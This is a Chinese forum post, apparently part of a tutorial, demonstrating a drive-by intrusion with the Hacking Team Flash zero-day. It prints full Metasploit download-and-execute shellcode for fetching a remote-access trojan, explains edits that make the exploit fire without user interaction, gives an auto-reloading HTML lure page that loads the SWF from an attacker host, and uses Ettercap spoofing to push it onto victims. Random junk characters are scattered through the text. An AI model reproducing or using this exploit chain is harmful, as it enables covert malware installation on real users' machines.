|
8 u0 N) S* t) N9 e$ e2 J0 X 三、flash 0day之手工代码修改制作下载者实例入侵演示
- f% r6 B) G* d
9 O$ U' h+ A& H2 d ^( x' T7 j5 g ]0 _3 l) c# n3 w
利用到的工具: / n; R9 [, |7 Y+ ?
' _! J) J) S: ^1 a5 M
* T C! H3 L7 K* t6 Y Msf
5 h6 d2 @% R T8 J/ E* A8 B
4 n W& K$ B0 c I! h2 J; Q- h
! e8 c, z* j- f3 w# ~+ B7 H Ettercap 7 E4 K) @: n) p$ l
! ]1 |# f7 f9 F& q* J. }4 c, G
+ \9 q$ _' _: a Adobe Flash CS6 5 T3 n6 F# F" d7 t" K
4 W% i- M L) Z) f' z
0 Q+ S2 a0 K- H7 t Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 V- W& x# ~( N, n
6 J% B5 T" m3 p Z* `" u O7 V5 K$ ]$ S) e# Y
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
A! i2 Z! l$ w) H* Q 6 @; J o2 n! Y+ i" V
3 [' I+ ~: x3 M) g% k8 U 如图:
* H1 I1 B& w% ~6 U0 i& z0 v2 w
0 E6 r9 k7 { G- `. c8 R9 K4 o
/ t( X2 k1 v. Q
4 P8 h6 N* |( E) u
0 R2 [; d" {1 I$ J4 M, v7 H; [9 {: F# ~, |4 [2 t- J* J' |% l6 v
 ! [9 U3 P, S& e5 y: F
& J6 f! [; {2 B) V4 P9 h5 {+ @
# m, T/ P5 M& _5 P, p0 ?% j0 \: i 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
' ^9 U2 x! c. L
. N! z, H4 C2 j' v% M Y a7 F% a4 c J% G# O# I$ C
$ o _3 C1 {1 q$ q 9 ^" @+ {9 _& H: f
/ q( I+ [1 E- z# }, H& ]
E9 h$ h; s e+ y, ~6 {' j! m
6 G6 n, Z2 f) C* E: q E( X% n! f2 l( a. _7 a5 z+ d6 b, T, J
然后执行generate -t dword生成shellcode,如下: \$ A/ y( A2 s- ]+ P7 D. p: K
% w2 a+ [) r8 s) ~# \; P% o
* C0 y$ q" Z6 u0 D) N% A# F 
- p4 A8 f8 a2 Q( D6 ~( G
2 s' `" l. i" h$ `; i+ S. Y" d4 g# C. Z+ v
复制代码到文本下便于我们一会编辑flash exp,如下:
8 r! R4 C- H& {/ S e4 @* @ ( U8 |: z" U4 d- s" y2 e4 x
1 N2 w; b4 D T M9 u 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 m! r8 J% p1 Y8 n
5 a( T% J/ C8 H2 v( T$ W
/ ~+ ~& c8 G+ D
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
7 @) x2 x. y# t8 I+ @ @" n
$ \( B4 A7 m7 M9 a* t$ i0 h. y) f$ |- V. T. W9 _3 B8 s0 B5 Q
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
5 q, e# p# B+ v' ?
i }" r K. t3 ]4 `- W9 K2 E. P( x! g* [, H4 N
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 7 {; g% @# [1 E" `8 u$ G9 \, g
& ~' Z3 Q" x% e( ^5 d; W j% u. f" w& K6 ?
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % t. g7 A- U- R
) u# }" H7 T- Z$ W5 U0 U
. [9 t+ C, h, e: w$ n- I 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . B3 j0 {- h( o! c b$ r! f
# z0 ]( ?, F2 t: y; V2 Y( j& S0 i, E$ @0 s( J! v
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 2 N# b- w" y3 f+ B
# a0 n; C3 o4 }6 `# I9 A
: P8 E* d: D, V5 s) h+ k3 E& W( r
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
- N4 L2 Y) X9 @# j& M% L ) m' D' x, B* F: v( V, x8 T
; R/ W4 A3 e `8 T; k% y0 R
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 f/ X' [2 j% j% B/ }' F+ q
" C" i. J5 _9 S e5 K
- t) m: n) g; @5 |: n
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, . K, M% i8 e7 Z
3 M' t: Y' J: C& L' L0 y2 c* U4 k' o
, l4 |4 d+ m7 ` q* ~: i
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
! C# v; e4 d/ i& n
2 z: Q8 q. n0 P( Q V& l7 h% |; }( Q3 O) j: w$ W: C/ F' Q: [
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ; z$ h5 t# r+ f5 L9 \$ S
# ]) F% l9 f- m' @ \- \, d* \8 |% ?& d* q+ R6 b+ C( T9 d( f4 M
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
/ c3 A7 x# x% D# g E& H
9 E( ~' u4 l( e( ?/ Q- D! b2 ], }' K9 G; i ]3 ~5 G' L
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + N& x9 K$ J! h4 H$ @! Q! L
- r" a& D5 w# h6 ^4 k( ^' y0 t1 Y: V3 i7 |9 u
9 K/ u! I! P1 p- N
2 x: D. ] M7 t; x, B$ H3 O
) @, T1 J5 G( U9 C- E 6 M& i: Z6 o5 d2 h2 B9 g: z
( l& \9 s! f2 W% L% d8 R# ^* h7 w) a1 R7 Q
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
0 x) q7 f, [+ M( w5 h
: ?* Z% f3 M W0 d2 I4 L, Y# {8 e5 l5 g: T
 - e( a- n$ c8 {) u
7 K4 u5 e( O- ^4 I' Q7 q! F
3 v" Q+ \& y( C
先修改ShellWin32.as,部分源代码如图:
7 D) f5 o' Q1 P' a: j8 V# P* U1 t& [ * n& I0 ^! R( m# O6 J
1 F/ k/ ~( l ]7 u/ W: Y6 ^
 + p9 c" X! r$ N" j5 m
( `+ y3 _- c# ~2 R: x+ r% H& U; v# O. A( a g y9 J' \+ I% \8 Z
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: " C" x I0 ~/ L
& r& b4 }. _$ K- d: z4 U. D6 x. {0 a, Z% J" U4 Q
2 e! }: y% @) ~* Z v- _1 R
# z0 J& e6 ?5 ?0 u. q# \2 m% u Y
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ) D( v# O. x8 H" O1 d5 Q
0 _0 E( K$ {1 ^& H5 \
* G9 |# \6 T* \+ e1 ?6 U0 Y6 |  # i4 ~ I- [" M8 G. |- i0 a8 H1 E
D! x: e4 O b8 B
4 Z; ^/ z$ I# ^, H
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 9 Y3 N8 D. l" \
3 R3 N( I- ~" J! d7 L+ c
' ]4 a7 M, v- G1 |5 j) G # W$ f( i" }( m0 N! O1 {. m
1 B5 r" [ e0 `* e5 ]4 j9 v% k- ^, S M, d
; L( t. M& V5 Z# ~1 g 1 V' g: B. A1 C0 e/ M8 k- E
# I7 J# z& c( H; v 
: s! f- E- i* f- R; d! q. ^
, R+ l; q! X1 V: ^$ z
6 K# W! _" I! H7 }% Q0 i: ]; X, h5 z 然后点保存,下面我们来编译一下,打开
5 |/ m2 X7 `+ ]4 q% w2 C- | 3 U; O' g" u8 Z
% a; t# N# i# Z5 | Y3 Y8 e9 J
exp1.fla然后点文件-发布,看看编译没错误
- _+ G3 p# K6 }4 t $ `. d4 o& K ]( ^3 T5 B3 r
7 u* z1 D y" U
! i, R& `" c( N! h
/ L7 _+ |9 k8 J% r
! Q/ T( O. i8 q ?! j3 _3 m- y & g5 n* u8 g! c3 ?2 M7 X% D
8 v# E4 }' i Y; r& K& g1 w$ m
5 w# u1 _+ e. l. _
0 |* [( }1 Z: B- e; k! d A9 Q3 p# f1 j5 P" Y; A
# A2 M k3 t' { ^ R$ U  3 r5 V& [. K. m$ ?
% ^* @% b, U" u' l# R
$ T% ^! x; Q% F1 h+ |( C. e 然后我们把生成的
/ G: \9 [3 T8 e' m4 x! q0 T- b
# Z$ G* x: J9 Z- m, ^- G
& q l$ J% F# Z- c0 X* i- r6 t1 } exp1.swf丢到kailinux 的/var/www/html下:
) s0 m( H2 a) y3 z7 Z7 n. o$ {
L/ d# _0 c: j; G' \
7 D" h# j5 @8 u% |* Y 然后把这段代码好好编辑一下 5 m( I- }1 E4 ]5 B* k. n" }
' s9 ^' Y9 @' S' q7 p4 a
C6 X2 F, l2 O7 \+ p0 _* o9 a
5 w8 u$ F5 q _; q' k3 r / d% s& T1 [0 S7 c. `* [
! n3 A `7 R! E3 p+ n$ h
. h* x4 q& F6 d8 x + D5 _. D0 h# Y' ~
3 [, r" m9 j3 [& ^4 d6 }+ P
/ x8 s C: m* l+ q! S- o$ T
$ K. O) _# ]3 l. Q+ Q- c( e; i4 d
. d [5 ?* [. g6 H0 v9 @ . p N0 O6 N! H- f! j9 D T
6 ?. D: a: I9 q( }
5 G; f. b6 @2 P) B
O9 Y/ b9 Q0 M+ [& I - c# |& Y; t4 v1 K! \* D8 c! n6 }5 `
8 z" f/ p# c2 A; |/ F# R. S3 V$ Q5 j
4 ~* F) V5 S8 H4 j, h& O# H: \. r . v! ^3 y# c! I+ f
" L- `2 B% l1 Z% q5 I5 L <!DOCTYPE html> 8 v+ K' e' y H5 ]7 I3 K4 q
6 P# P! `; q0 x5 E
5 s/ S9 I N% r2 h; d& j C <html>
8 ^1 w6 T4 L5 E$ B/ s
, g2 R0 S c9 B" Q) t2 N* ]$ H M
) ]" C9 I5 U- v9 R$ j7 D <head> + R' \; U8 _% ^) V; X9 F8 m/ ^
& M9 `4 v7 U/ ]0 J. C6 y7 K* x2 W! Y5 G2 w! N6 E
<meta http-equiv="Content-Type" content="text/html;
: |9 d( C; o% v4 E% Q# }
6 e" z* y/ b0 e I v9 _; k# D: C0 K/ ^
charset=utf-8"/> & V8 F" |3 Z7 G$ L) {# |) E& T
+ F9 T( l+ L8 F
2 P2 S0 a8 a, A) v7 B7 E* G) j5 O
</head> ' e/ n# r: {! @2 A$ R
; Z& g6 _+ B4 R7 z6 i; E+ H3 Y% A; T; F
<body>
. t; \4 \4 V: y j0 X9 [. | 0 ?2 f' f2 ]' O) M
; ~: q( q$ p' Z! L8 j <h2> Please wait, the requested page is loading...</h2> - v$ t- ?7 Y. H" q1 b) \, t
6 j2 W2 j& M# ~ ?
S) D. {( y4 p$ N: o, B: b
<br> 6 h) f+ e. H: Z" F2 [" q
/ `# y& Y. R$ s% K3 _; U) J# c; N2 Y; x! [3 X) y6 ^
<OBJECT
1 u9 P- j# K2 l( ~
{; L8 @& I. L, |/ h5 k) L2 s& C& y d6 }8 A! I& G8 h$ ^
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie ( |4 s; _! E8 R5 k4 `% r
( y8 p2 I; S8 G; g+ | |& k- |
7 f, U4 Y6 G K0 a. L/ C VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
, Y4 c& }7 P: n. g, B2 X ^
# [' _/ t1 {) z) N$ J; u* x& a3 _" Y; x
</body> / i# T6 Q+ [$ q. R1 X9 z+ ~
! s' z" J1 M b1 k- [0 B' G8 I
8 x, v' x- g& D0 \+ U4 C5 v* b <script>
6 g$ o, g; i- m! P6 ^- W! a5 _ # [$ i: W* @: g- w$ y6 x1 ^$ ]
- J* v. u: Z9 t3 l0 }: x, j
setTimeout(function () {
) n- z4 I7 Y: F5 a Z* Y6 x; L & I5 t$ m# G% _- D: ?
' p* T0 ~* L/ m. T' n9 a7 H. B 6 a+ u) i/ A! z9 |/ O8 A
* ~+ b" P! }& n. K9 ?) P( q D# j; m7 W
E6 y& T/ c5 V& k) @- d window.location.reload(); 9 ?* h0 x7 M; w8 N
9 \ v4 W0 ?7 P4 V2 W3 u! v& @. C
' ~% x$ S. x, K, Y N3 n9 L }, 10000);
7 m5 m) s' e8 Z1 N 0 {4 _" w6 s8 d! h
! _( E7 d9 L# w" k ]4 B- b% X
9 y( j# E5 _- q5 |
z7 Z: A8 M4 i( J" }% s3 ?: E7 P. n" W S& V5 [
</script> " v4 Y. R, Q4 M- |
/ r/ z- |% }6 R# P
$ b$ a+ p$ a2 h/ M6 i& h% Y </html> ; n% X& f) C0 V8 e2 U
) _, X: D7 [ R ~4 F& z
1 u7 I& m! w/ q* J+ Y6 ? ! ~3 B! g: ?" Y5 k Y/ B! E
: z3 ~/ R' j O
! X7 `- Z9 o1 y( }7 F4 V* k- I
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
D$ ]6 x1 |. w8 X+ h 8 Z3 {( \1 l) M/ k) ~5 V
7 J j( I5 w9 E: o" V
& h9 G$ R: q* V3 H6 e$ h+ z ( s& R, D3 ?6 }* Z! |
' `1 W* R6 d) R; ]9 A! l8 E2 Z: r
; o7 d, d3 q0 B
2 r) u3 d9 d( L, i) e) V0 s B. D A# T. ]
, ]0 H, @% I: d: b
5 P3 ^8 ^' g; z/ B; Z. |2 ^9 j$ b
# G" G( [" H" [( Q ; A2 M( t* T+ `; Y. _( [* o% l
2 F0 K) Z3 `" R
3 x Z4 h& a" }8 o P f* v 1 n9 ^3 t7 u3 k4 M
9 k9 _% d+ B: i4 z% Z: [' ?
# [6 e* G% ?) g 下面我们用ettercap欺骗如图: 7 F- L" d" S2 a$ x" V4 `
~+ T; P7 H4 v
: v3 r: x) k. M/ a' `3 k. I 
/ X+ ~9 D& g( C- ` ; x; ~* h3 g0 X. ?
* n9 Z9 b- L( M+ C$ j* _
2 |9 [7 E8 A% J: m
. W9 g5 P3 h2 G3 l
. L6 P% y: D% w7 X' j 下面我们随便访问个网站看看:
+ w0 {, P/ K2 H% M $ q* {( x' A$ S7 h3 c4 t* J% o
0 s$ h# a# t3 J- ^ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
. O6 s8 I- \- a: n
4 x7 B6 Y; m) C: g+ \$ n- o6 H q. J' k! T7 G, w, D9 z! _
4 }) r3 L+ p% h! U0 O
. B I% B2 C, y4 Z2 b/ w* ?$ M3 S7 k4 \" h; y2 p. \
我们看另一台, 5 f$ \- F7 e% G6 H0 o2 K: x
4 {9 X0 }* \/ |
- e* {& l& B. X9 Q8 y
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
7 E+ W& q% }6 x | 
发表于 2018-10-20 20:28:55
收藏
支持
反对